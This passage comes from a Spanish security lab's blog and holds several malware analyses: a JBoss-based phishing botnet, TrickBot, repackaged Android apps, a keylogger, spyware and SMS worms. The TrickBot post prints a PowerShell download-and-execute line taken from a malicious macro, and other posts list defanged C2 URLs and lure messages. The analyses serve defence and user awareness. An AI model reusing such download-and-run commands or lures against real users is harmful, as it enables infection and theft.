lunes, 12 de diciembre de 2016

Análisis de una Botnet usada para Phishing

Quizás estemos acostumbrados a que los atacantes inviertan en la “compra" de dominios y servidores "bulletproof" para desplegar sus campañas de malware y alargar los cierres todo lo posible. Pero en el mundo del phishing, cuyo rendimiento económico por usuario afectado suele ser menor, podemos entender que utilicen otras técnicas más "económicas" para hacer un despliegue masivo de campañas y prioricen vulnerar o reutilizar servidores ya vulnerados.

Recientemente al analizar y realizar el cierre de las últimas campañas que nos llegaban al departamento antifraude, pudimos comprobar en una de ellas dos patrones comunes: múltiples niveles de redirección y una vulnerabilidad común a todos los servidores utilizados para enmascarar/desplegar el phishing.

Redirecciones

Sobre el primer patrón, es habitual que el atacante utilice algún redirector o acortador de URLs para llevar a los visitantes al phishing, pero esta vez existían múltiples niveles de redirección para filtrar a los posibles afectados, así como bloquear y dificultar los cierres ya que enmascaraban mediante subdominios fraudulentos los verdaderos servidores/IP donde residía la lógica de la campaña.

Principalmente se utilizaba un acortador de URLs (tinyrul, goo.cl o similar) para la campaña de correos masivos que recibían los usuarios. Seguidamente se redireccionaba al visitante a dos dominios fraudulentos, uno donde se filtraba mediante un abultado ".htaccess" a los visitantes por GeoIP (cerca de 5MB) y un segundo para enmascarar la IP del servidor comprometido donde residía el phishing. Éste sería el croquis:

[ Acortador URL ] → [ 1er subdominio redirección ] → [ IP con redirección por GeoIP ] → 
  [ 2º subdominio redirección ]→ [ IP con el phishing final ]

Como ejemplo, estos fueron parte de los subdominios montados y utilizados:

Cada uno de ellos (subdominios) resolvía a una IP distinta a la del dominio principal, donde residía toda la lógica de la campaña.

Servidores vulnerados

El segundo patrón común ha sido el uso de servidores comprometidos, tanto para los dominios de redirección (mediante subdominios montados en cpanels/wordpress comprometidos) como para los servidores que albergaban la lógica de redirección y el servidor final con el phishing.

Es en esta parte donde pudimos comprobar que todos ellos utilizaban JBoss vulnerables. Bien por ser versiones antiguas sin actualizar (como la 5.x) o, sobre todo, por no proteger adecuadamente el acceso a la consola de administración (jmx-console) (CVE-2010-0738) o a ‘invokers’ accesibles como ‘JMXInvokerServlet’(CVE-2007-1036, entre otros).


Pudimos comprobar también que algunos servidores llevaban comprometidos desde hace tiempo, ya que respondían a ciertas peticiones conocidas por un gusano de 2010/2011:


Y para empeorar las cosas, servicios en modo ROOT:



Esto sirvió al atacante para tener, de manera cómoda, una lista de servidores JBoss para su botnet; mediante una variante del script en perl ‘Shellbot/Perlbot’ de origen brasileño utilizado para montar botnets de tipo IRC. Tanto por las modificaciones realizadas, como por la similitud con anteriores campañas que hemos registrado en nuestros sensores, tenemos cierta certeza que el atacante es de origen marroquí.


Como comentábamos en nuestra una-al-día, a día de hoy existen más de 30 servidores comprometidos, aunque están siendo monitorizados desde nuestro departamento para prevenir cualquier apertura de nuevas campañas.



Más información:

Una-al-día: Phishing botnet: nueva campaña que afecta a diversas entidades bancarias europeas



José Mesa Orihuela



martes, 29 de noviembre de 2016

Continúan las andanzas de Trickbot

Hasta ahora encontrábamos el troyano bancario TrickBot como un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.

Captura del documento de Word que solicita habilitar el contenido


Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.

Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...

PowerShell (New-Object System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process 'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';

Tras la descarga de la falsa iagen ".png", se almacena en %temp% para posteriormente ser ejecutado con una llamada a start-process


Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).

Esta vez, además de a los clientes de las entidades ya mencionadas se suman a la lista de afectados Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).

Recuerda que si recibes un documento por parte de un desconocido no debes abrirlo. A esto debemos añadir, que no se deben habilitar posibles ejecuciones de contenido en documentos de Office cuando el destinatario de este es desconocido, para evitar este tipo de amenazas.

Más información:

una-al-dia (07/11/2016) El troyano bancario TrickBot azota a Europa
  


Fernando Díaz

miércoles, 23 de noviembre de 2016

Las apariencias engañan

Una de las técnicas más habituales del malware para lograr la infección es hacerse pasar por aplicaciones normales y de utilidad para el usuario. Vamos a analizar dos aplicaciones que en principio pueden parecer inofensivas, pero que después incluyen un elemento bastante peligroso que veremos a continuación.

Las dos aplicaciones que nos ocupan en esta ocasión son las siguientes:


A primera vista, parecen una aplicación de aprendizaje de C++ y otra para trámites bancarios respectivamente. Y en efecto, lo son:




¿Qué elemento peligroso nos encontramos? Las aplicaciones al pasar por los escáneres antivirus parecen limpias, sin ningún signo de peligro:



Pero encontramos lo siguiente: ambas aplicaciones contienen una payload de Meterpreter. 

Para los que lo desconozcan: 

"Meterpreter es un Payload que se ejecuta después del proceso de explotación o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para meta-interprete y se ejecuta completamente en memoria; evitando así tener problemas con los Antivirus."

Lo que ha ocurrido en esta situación es que se ha utilizado una herramienta para infectar aplicaciones de Android utilizando los propios permisos de la aplicación y de esta manera evitar la detección de los antivirus, incluso se pueden añadir permisos nuevos. Concretamente, hacen uso de esta inyección de código; https://github.com/sensepost/kwetza

Listado de posibles permisos añadidos...

Si miramos mas a fondo la aplicación, encontramos que algo no cuadra...


Miramos por encima el smali de la activity... 


Y efectivamente, verificamos que incluye dicho payload. Mucho más sorprendente si recordamos que habían pasado como inofensivas ante los escáneres antivirus. Esto ocurre en ambas aplicaciones, que a pesar de ser oficiales re-empaquetadas, cuentan con código modificado y no se distribuyen por markets oficiales como Google Play

Una vez más, recordamos la necesidad de evitar la descarga desde markets no oficiales o de webs de dudosa fiabilidad, para evitar este tipo de infecciones. 




Fernando Díaz


lunes, 14 de noviembre de 2016

El carding puede infectarte

¿Eres de los que cree que robar tarjetas es algo de pulsar una tecla? Si es así, es posible que el malware que veremos a continuación acabe afectándote.

Se trata de un programa que supuestamente nos permitirá obtener tarjetas de crédito válidas para realizar compras on-line. Lo que englobaríamos dentro del "Carding", es decir, el uso ilegitimo de tarjetas de crédito, o sus números, pertenecientes a otras personas.

Captura del Malware tras pulsar el botón "Connect"

Como siempre nada es lo que parece. El programa en cuestión se nos presenta de la siguiente manera, junto con un botón que nos "da acceso" a la base de datos, y otro que supuestamente comprueba que las tarjetas extraidas de la "base de datos" funcionen. Como podéis imaginar, ninguno de estos dos botones cumple de lejos alguna de estas funciones. 

Una vez pulsado el botón, hará durante un tiempo determinado un falso proceso de conexi, hasta decir que ha fallado:

Falso proceso de conexión remota

Mientras tanto, aprovechará para volcar sin que te des cuenta los archivos maliciosos en tu disco. Claro esta, también añade el ejecutable malicioso al arranque de Windows. 

Volcado de uno de los 3 ejecutables maliciosos

Se comunica con "hxxp://l75qjosx54mue7lv.onion.rip/neutron". Además cuenta con un cliente de SMTP utilizado para el envío de información. 

Información enviada inicialmente al servidor remoto

Entre otras cosas, para hacer pruebas, crea los ficheros necesarios para el envío de correos por SMTP.


Y llegamos a la parte clave... Una de las "features" de este malware es la de keylogger, pero éste solo actúa en determinadas situaciones. Por ejemplo, cuando detecte que se está visitando la página de las siguientes:
  • Amazon
  • Apple
  • Blockchain o Blockchain wallet
  • Coinbase
  • eBay
  • Gamil
  • Localbitcoins
  • OnlineBanking
  • NETELLER
  • PayPal
  • Perfect Money
  • Facebook
  • Yahoo
  • Microsoft / Outlook 

No obstante, el portapapeles si que será copiado en cualquier situación a un archivo instantáneamente.. El objetivo de este malware en concreto, parece ser su propia distribución por e-mail aprovechando la librería que incorpora y al usuario en si, y además el robo de datos de determinados sitios específicos.



En un principio, contaríamos finalmente con los siguientes archivos:
  • %appdata%/Microsoft/Windows/: winhost.exe, taskengine.exe, sys32.exe, EASendMail40.dll, _logWindows, _mailConfig.txt, _mailLetter.txt, _mailList.txt
Así que ya sabes... Ten cuidado con este tipo de herramientas, un solo click puede salir muy caro...  




Fernando Díaz

viernes, 11 de noviembre de 2016

Ransomware aprovecha la imagen de Amazon para infectar

Todos conocemos Amazon, la gran tienda online donde podemos comprar todo tipo de cosas: Desde lo último en electrónica hasta incluso la comida de la semana. Por ello, los creadores de ransomware hacen uso de cualquier método para lograr infectar a usuarios y así obtener mayores ingresos. Ésta vez, se hacen pasar por un falso correo de una factura de Amazon.


El susodicho correo, incluye datos falsos de un supuesto pedido así como un archivo comprimido (.zip) adjunto. Este zip incluye un fichero en javascript (extensión .js) que será el encargado de descargar el malware.

Falso mensaje recibido

Archivo adjunto con el dropper.

Una vez infectado, los archivos con las extensiones elegidas por los atacantes serán cifrados y pedirán un rescate para recuperar dichos archivos.

Este tipo de correos se ha visto con anterioridad, sin embargo esta vez el contenido acaba resultando muy peligroso para el usuario.

Como dato anecdótico, este Ransomware se lanza con "nipple".


Para evitar este tipo de amenazas si recibes un correo que piensas que no deberías haber recibido: evita abrir este tipo de adjuntos. ¿No has hecho una compra en Amazon y has recibido este correo? Entonces posiblemente el objetivo de dicho correo, es aprovecharse de tu curiosidad para infectarte.





Fernando Díaz

jueves, 3 de noviembre de 2016

Exaspy, un nuevo malware espía para Android

El malware no para, y nuestro Laboratorio tampoco. En esta ocasión tenemos en nuestro repositorio de malware una nueva muestra un troyano para dispositivos Android. Conocido como Exaspy pretende espiar múltiples aplicaciones. Como es habitual su análisis resulta muy interesante.



En esta ocasión, la aplicación se hace pasar por Google Play Services, aunque podemos observar rápidamente que ni el autor ni el nombre del paquete coinciden con el original. No conforme con eso, la lista de permisos iniciales que solicita la aplicación es un tanto sospechosa:


Entre las posibilidades de este malware, se incluye la posibilidad de grabar audio, dentro y fuera de las llamadas, recolección de mensajes SMS/MMS y de aplicaciones como WhatsApp.

Modulos con los que cuenta este RAT

A la hora de instalarse, solicita permisos de administrador del dispositivo, de igual forma intenta solicitar root para poder ejecutarse completamente. Dentro de las posibilidades de root, cuenta con la recolección de SMS, MMS, y además de parsers de las bases de datos de mensajes de aplicaciones conocidas. 

Módulo de recolección de mensajes (WhatsApp)


Son muchas las aplicaciones afectadas. La lista completa incluye: email, Facebook Messenger, Gmail, Hangouts, Keep, PayBox, Skype, Viber y WhatsApp. 

Cuenta además, con todo tipo de funcionalidades:
  • Recolección de mensajes, acceso al historial del navegador
  • Obtención de fotos de la galería del dispositivo
  • Control de la cámara, y micrófono del dispositivo
  • Capturas de pantalla del dispositivo
  • Acceso a la localización del dispositivo
  • Recolección de contraseñas almacenadas en el dispositivo (WiFi)
  • Acceso a la shell del sistema afectado
Contamos además, con la URL de descarga del APK malicioso, así como de la URL de comunicación con la API del RAT.

hxxp://exaspy(.)com/a.apk (Futuras actualizaciones)
api(.).andr0idservices(.).com (API)
Es interesante, que dicha comunicación con el C&C permite (a parte de la tranmisión de archivos locales) la ejecución de comandos de shell. Además de permitir el uso de futuros posibles exploits no incluidos en el malware inicial, lo que le puede permitir elevar privilegios en el dispositivo. 

Además, esta aplicación no cuenta con una MainActivity, lo que provoca que no se muestre en la lista de aplicaciones instaladas del Launcher. Una forma más de evitar su detección por el usuario. Dentro de la funcionalidad de root, cuenta con la posibilidad de matar el zygote de Android, provocando un soft-reset (killProcess("zygote");). Aunque resulta más interesante como el malware intenta quitarse de encima al servicio de Samsung, para que éste último no le mate. Finalmente, para evitar ser eliminado se instala como servicio del sistema.


Ante este tipo de malware, una vez más las recomendaciones habituales. Que pasan por no visitar enlaces desconocidos, evitar la instalación de aplicaciones fuera del Market oficial y la instalación de Koodous desde Google Play:



Fernando Díaz



viernes, 28 de octubre de 2016

Gusano de Android utiliza ingeniería social para distribuirse

Son muchas las formas de distribución del malware, una de las más habituales es la ingeniería social. En el Laboratorio hemos encontrado una nueva muestra de un gusano para Android que aprovecha esta técnica con gran efectividad.

¿Pero, qué es eso de la ingeniería social? Alguna vez te habrá llegado un mensaje del estilo: "¡Mira esta foto!", "A ver si te encuentras en la foto de anoche!", "Mira, ¡agua en Murcia!". Todo esto, por supuesto, acompañado de un enlace o foto falsa con su respectivo "regalito". Este gusano aprovecha dicho método para distribuirse.

Evidentemente usa el desconocimiento o la curiosidad del usuario para instalarse. Es el propio usuario el que movido por el mensaje abre un enlace o aplicación incluida y de esa forma el malware termina instalado en el dispositivo.

Una vez instalado, solicita permiso para añadirse al dispositivo como administrador, además de pedir autorización para bloquear la pantalla. Con esto impide al usuario detener la acción maliciosa. Por ejemplo, bloquear el teléfono mientras se están enviando SMS, o desbloquearlo para frenar este comportamiento.


En este caso, la explicación que nos da (en chino), para solicitar este permiso es "Improved access protection".

El mecanismo de distribución, comienza nada más abrirse la aplicación.


Como observamos, la aplicación lee la lista de contactos al completo, almacenando el nombre junto con el número de teléfono. De esta manera puede enviar mensajes 'personalizados' a cada uno de los contactos. Este mensaje, sería algo así:

(CONTACTO):这影像 pywkh(.)cc = (CONTACTO):Mira esta imagen pywkh(.)cc

NOTA: No acceder a la URL, contiene la APK maliciosa

Una vez el usuario reciba el enlace, enviado por alguien de confianza y además mencionando su nombre, probablemente lo pulsará y será infectado.

Se recolecta información del dispositivo, y posteriormente se comunica por SMTP. Por "sorpresa", el autor no se ha molestado en ocultar sus credenciales; es decir, van en plano.




El peligro de este Malware no solo reside en su gran facilidad de distribución, sino que debido a tener diferentes servidores desde donde descargar el APK malicioso, puede cambiar en cualquier momento a una aplicación mucho más peligrosa.

Como conclusión de este análisis, tenemos las recomendaciones habituales de hacer click o pulsar sobre enlaces que desconozcamos, y menos aun instalar aplicaciones desconocidas, especialmente fuera del Market oficial.

SHA256: 15af04bba0ed13f13e49ce5cad459d88dbcf723b47becc3e11a7f8ff6075635e



Fernando Díaz



jueves, 20 de octubre de 2016

Integrando las detecciones de Koodous en tu flujo de negocio

Hace unos días explicamos en otra entrada de este blog cómo crear reglas Yara para detectar malware en Koodous. Ese post fue una introducción a las reglas Yara para posteriormente explicar cómo integrarlas en el modelo de negocio de una empresa. Es lo que vamos a realizar a continuación.

Queremos dar ideas sobre cómo automatizar la detección de reglas Yara, es decir, utilizar la API que provee Koodous para extraer todas las aplicaciones detectadas por una regla. Básicamente hemos realizado un script para tal fin que ha sido publicado en GitHub (https://github.com/Koodous/Scripts/blob/master/new_detections.py), pero nos gustaría explicar su funcionamiento para cualquier usuario pueda adaptarlo a sus propias necesidades y flujo de información.

Dicho script se basa en las notificaciones de usuario, por lo tanto lo primero que haremos será crear una regla Yara en Koodous:


En este caso se ha creado una regla para detectar unas muestras concretas de un SMSFraud. El título indicado en la parte superior "SMSFraud" es importante, pues nos indicará la regla que ha detectado el APK cuando usemos el script. Debes elegir un nombre identificativo para tu sistema.

Después es importante tener en cuenta que las notificaciones deben estar activadas. En la parte derecha de la edición de reglas debe aparecer así:


Al menos el botón de "Notify me" debe estar activado. Las notificaciones que genere esta regla serán las que usemos para integrar nuestro sistema.

A continuación descargamos el script de:

Es un script en Python bastante simple. Lo único que tenemos que configurar a priori son estos campos dentro del script:


"RULENAMES" es una lista con los nombres de las reglas que queremos automatizar. En este caso utilizamos "SMSFraud".

"TOKEN" debe ser nuestro token de usuario. Podemos verlo en la siguiente URL una vez logueados en Koodous: https://koodous.com/settings/profile

"WAITING_TIME" corresponde al tiempo de espera entre un ciclo y otro expresado en segundos. El tiempo por defecto son 5 minutos, suficientes para no saturar el sistema y que todos podamos vivir en armonía :)

Después de esto sólo hace falta lanzar el script y ver resultados:


Por supuesto, dentro del script hay una función llamada "send_to_another_system". En ella se debe incluir el código que envíe al sistema de tratamiento de muestras.


Antonio Sánchez


 

jueves, 13 de octubre de 2016

Curiosity, el nuevo gusano de Android

Lejos de la realidad, el “Curiosity” al que se refiere al título, nada tiene que ver con ninguna misión espacial "murciana". Esta vez, se trata de un nuevo gusano para Android que en la actualidad está alcanzando un gran número de infecciones.

Gracias a Koodous hemos conseguido una muestra y hemos procedido a un análisis del mismo
En la actualidad ya hay hasta 11 muestras que cumplen la regla Yara creada para la detección de Curiosity.

Si analizamos el comportamiento de Curiosity vemos que una vez infecta a la víctima obtiene una lista de todos los contactos registrados en el teléfono y se autoenvía a través de enlaces en SMSs y phishing. Esto le ha permitido conseguir distribuirse rápidamente en diferentes dispositivos y crear una amplia red de infecciones.

Este malware, actúa de la siguiente manera:
  • Una vez instalado, se establece como aplicación de SMS por defecto.
  • Intercepta los mensajes recibidos por el usuario.
  • Elimina el número del que recibirá la comunicación de la lista negra, para poder establecer contacto.
  • Aprovecha el servicio de Push de Google (C2DN) para las comunicaciones SMS o llamadas.
  • Colecciona la información del usuario, mensajes, contactos, modelo del teléfono, historial del navegador, aplicaciones instaladas, marcadores… (Se verá más en detalle a continuación).
  • Toma el control sobre las llamadas, tanto para realizarlas como para colgar el teléfono al usuario.
  • Toda esta información es posteriormente enviada a un servidor remoto (atacante).




La curiosidad mató al robot

Observamos cómo se cumplen los comportamientos anteriores. Primero comprueba si es la aplicación por defecto para el envió de SMS, de lo contrario se establecerá como tal:


Y el comportamiento referente a la lectura de los mensajes entrantes, podemos observarlo a continuación…




Como "anécdota", el creador de esta aplicación dejó su presunta dirección de correo electrónico a la vista para recibir los reportes de fallos en su aplicación (Y así poder mejorarla a futuro).


Los primeros permisos que solicita, se pueden ver a continuación:

private static final String[] INITIAL_PERMS = {
"android.permission.ACCESS_FINE_LOCATION",
"android.permission.ACCESS_COARSE_LOCATION",
"android.permission.CALL_PHONE", "android.permission.SEND_SMS",
"android.permission.READ_SMS", "android.permission.READ_CONTACTS",
"android.permission.WRITE_CONTACTS",
"android.permission.READ_CALENDAR",
"android.permission.WRITE_CALENDAR" };


También, gracias al "descuido" por parte del autor de este Malware, contamos no solo con el servidor al que se conecta sino, que observamos que cuenta con una API que utiliza para comunicarse.












Además, si observamos dicha URL, podemos ver cómo enmascara la página principal…


Ninguna de las funcionalidades de la web es operacional, salvo el login… (Y la API)

Esta API, ofrece funcionalidad el control de las llamadas, de las cuales almacena toda la información disponible, quién llamó, cuánto duró..:


Además del control sobre las llamadas, también facilita el envío al atacante de información como contactos, SMS almacenados, historial de llamadas grabadas...

Entre los mensajes utilizados para distribuirse, encontramos uno de ellos en español, por lo que es posible que este troyano se distribuya por países hispano-parlantes: El mensaje en español empleado para su propagación es 
"Hola   He encontrado aquí sus fotos privadas
http://bit.ly/XXXXX
clic para ver
".
Además de otros idiomas que podemos observar en la captura mostrada a continuación:


También comprobamos como roba más información: IMEI, modelo, sistema operativo, red conectada, teléfono, país…



Como recomendación ante este tipo de amenazas, que se distribuyen a través de SMS es no visitar enlaces desconocidos que lleguen (especialmente, si desconocemos quién nos envía el mensaje), evitar la instalación de aplicaciones fuera del Market oficial y la instalación de Koodous desde Google Play:



Fernando Díaz